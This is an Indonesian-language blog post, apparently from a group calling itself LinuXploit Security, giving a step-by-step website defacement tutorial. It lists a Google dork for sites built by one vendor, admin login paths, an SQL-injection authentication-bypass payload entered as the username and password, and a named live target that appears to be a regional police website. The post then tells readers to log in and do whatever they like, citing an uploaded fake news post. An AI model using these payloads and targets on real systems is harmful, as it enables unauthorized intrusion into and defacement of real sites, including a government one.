Deface SQL-Injection Without Quote

LinuXploit Security - Halo exploiter. kali ini saya akan membagikan tutorial deface lagi metode/PoC SQL-injection without quote. cara ini mirip seperti bypass admin/sql ( '=''or' ) dan ( ' or 1=1 limit 1 -- -+ ). ok langsung aja ya.

#Google Dork :
- Powered by SHODH TECHNOLOGIES ( Kembangin Lagi )
#Admin Login :
- /admin
- /web-admin
#User : \
#Pass : ||1#
#Live Target : http://tanahlaut.kalsel.polri.go.id/polres/

1. Dorking Dulu / Gunakan Live Target Diatas

2. cek admin loginnya /admin atau /web-admin. di web itu admin loginnya /admin

3. masukkan user dan passnya


4. kalau vuln bakalan masuk ke dashboard


5. kalo udh masuk yaudah terserah mau diapain. disini saya cma upload berita

6. and boom


Sekian dri saya.
bagi kalian blogger yg mau buat konten ini. tolong budayakan referensi :).
LihatTutupKomentar